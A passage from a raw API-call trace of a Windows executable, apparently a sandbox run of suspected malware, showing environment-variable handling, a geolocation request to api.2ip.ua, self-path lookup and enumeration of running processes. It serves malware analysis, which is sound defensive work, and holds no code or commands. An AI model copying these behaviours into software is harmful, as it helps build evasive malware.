RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x54 [0051.588] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x58) returned 0x260ae8 [0051.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0051.588] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1b) returned 0x25f2d8 [0051.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x25f2d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0051.588] GetLastError () returned 0x0 [0051.588] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x58 [0051.588] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x5c) returned 0x260ae8 [0051.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0051.588] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25abe0 [0051.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x25abe0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0051.588] GetLastError () returned 0x0 [0051.588] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x5c [0051.588] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x60) returned 0x260ae8 [0051.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0051.588] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x29) returned 0x25b2c0 [0051.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x25b2c0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0051.588] GetLastError () returned 0x0 [0051.588] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x60 [0051.588] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x64) returned 0x260ae8 [0051.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0051.589] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x25f300 [0051.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x25f300, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0051.589] GetLastError () returned 0x0 [0051.589] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x64 [0051.589] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x68) returned 0x260ae8 [0051.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0051.589] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x41) returned 0x256dd0 [0051.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x256dd0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0051.589] GetLastError () returned 0x0 [0051.589] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x68 [0051.589] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x6c) returned 0x260ae8 [0051.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0051.589] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x17) returned 0x260b60 [0051.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x260b60, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0051.589] GetLastError () returned 0x0 [0051.589] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x6c [0051.589] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x70) returned 0x260ae8 [0051.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0051.589] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xf) returned 0x25e8c8 [0051.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x25e8c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0051.590] GetLastError () returned 0x0 [0051.590] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260ae8) returned 0x70 [0051.590] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260ae8, Size=0x74) returned 0x260b80 [0051.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0051.590] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x16) returned 0x260ae8 [0051.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x260ae8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0051.590] GetLastError () returned 0x0 [0051.590] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x74 [0051.590] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x78) returned 0x260b80 [0051.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0051.590] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x25b2f8 [0051.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x25b2f8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0051.590] GetLastError () returned 0x0 [0051.590] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x78 [0051.590] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x7c) returned 0x260b80 [0051.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0051.591] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x29) returned 0x25b330 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x25b330, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0051.591] GetLastError () returned 0x0 [0051.591] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x7c [0051.591] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x80) returned 0x260b80 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0051.591] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x15) returned 0x260b08 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x260b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0051.591] GetLastError () returned 0x0 [0051.591] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x80 [0051.591] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x84) returned 0x260b80 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0051.591] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x25f328 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x25f328, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0051.591] GetLastError () returned 0x0 [0051.591] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x84 [0051.591] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x88) returned 0x260b80 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0051.591] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x25b368 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x25b368, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0051.591] GetLastError () returned 0x0 [0051.591] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x88 [0051.591] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x8c) returned 0x260b80 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0051.591] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x12) returned 0x260b28 [0051.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x260b28, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0051.591] GetLastError () returned 0x0 [0051.591] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x8c [0051.592] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x90) returned 0x260b80 [0051.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0051.592] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x18) returned 0x260c18 [0051.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x260c18, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0051.592] GetLastError () returned 0x0 [0051.592] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260b80) returned 0x90 [0051.592] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260b80, Size=0x94) returned 0x260c38 [0051.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0051.592] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x46) returned 0x256e20 [0051.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x256e20, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0051.592] GetLastError () returned 0x0 [0051.592] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x260c38) returned 0x94 [0051.592] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x260c38, Size=0x98) returned 0x260c38 [0051.592] GetLastError () returned 0x0 [0051.645] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.647] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.647] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.655] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8ec) returned 0x261fd8 [0051.715] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.715] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x10) returned 0x25e8e0 [0051.715] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.715] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.716] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.766] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x261de8) returned 0x80 [0051.814] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0053.851] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x40) returned 0x2554a0 [0053.857] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0066.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b638, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18de38 | out: lpBuffer=0x18b638*, lpdwNumberOfBytesRead=0x18de38*=0x1d1) returned 1 [0066.717] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0066.723] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0066.729] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x20) returned 0x26daf0 [0066.741] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x1e0) returned 0x29d8b8 [0066.753] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x29d8b8 | out: hHeap=0x240000) returned 1 [0066.759] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x26daf0 | out: hHeap=0x240000) returned 1 [0066.759] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2554a0 | out: hHeap=0x240000) returned 1 [0066.765] GetCurrentProcess () returned 0xffffffff [0066.765] GetLastError () returned 0x2 [0066.765] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0066.771] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x10) returned 0x2896a0 [0066.776] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x8ec) returned 0x3138598 [0066.782] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x800) returned 0x31397c8 [0066.782] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31397c8, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe")) returned 0x50 [0066.782] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0066.789] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x810) returned 0x3152ed8 [0066.789] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" " [0066.789] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" ", pNumArgs=0x18df18 | out: pNumArgs=0x18df18) returned 0x3122910*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0066.793] lstrcpyW (in: lpString1=0x18eba8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0066.802] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" " [0066.802] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" ", pNumArgs=0x18deb4 | out: pNumArgs=0x18deb4) returned 0x3122910*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0066.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned="243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0066.802] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0066.804] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcesses") returned 0x0 [0066.805] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcessModules") returned 0x0 [0066.805] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleBaseNameW") returned 0x0 [0066.805] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x74fe0000 [0066.861] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcesses") returned 0x74fe1544 [0066.862] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcessModules") returned 0x74fe1408 [0066.862] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleBaseNameW") returned 0x74fe152c [0066.862] EnumProcesses (in: lpidProcess=0x1836b0, cb=0xa000, lpcbNeeded=0x18dec0 | out: lpidProcess=0x1836b0, lpcbNeeded=0x18dec0) returned 1 [0066.871] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0066.871] CloseHandle (hObject=0x0) returned 0 [0066.871] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0066.871] CloseHandle (hObject=0x0) returned 0 [0066.871] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0066.872] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0066.873] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0066.873] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0066.873] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0066.873] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0066.873] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0066.873] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0066.873] CloseHandle (hObject=0x0) returned 0 [0066.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5bc [0066.873] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0066.874] CloseHandle (hObject=0x5bc) returned 1 [0066.874] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5bc [0066.874] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0066.874] CloseHandle (hObject=0x5bc) returned 1 [0066.874] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x0 [0066.874] CloseHandle (hObject=0x0) returned 0 [0066.874] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x5bc [0066.874] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0066.874] CloseHandle (hObject=0x5bc) returned 1 [0066.874] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c4) returned 0x0 [0066.874] CloseHandle (hObject=0x0) returned 0 [0066.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x5bc [0066.875] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0066.875] CloseHandle (hObject=0x5bc) returned 1 [0066.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x720) returned 0x0 [0066.875] CloseHandle (hObject=0x0) returned 0 [0066.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x0 [0066.875] CloseHandle (hObject=0x0) returned 0 [0066.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x0 [0066.875] CloseHandle 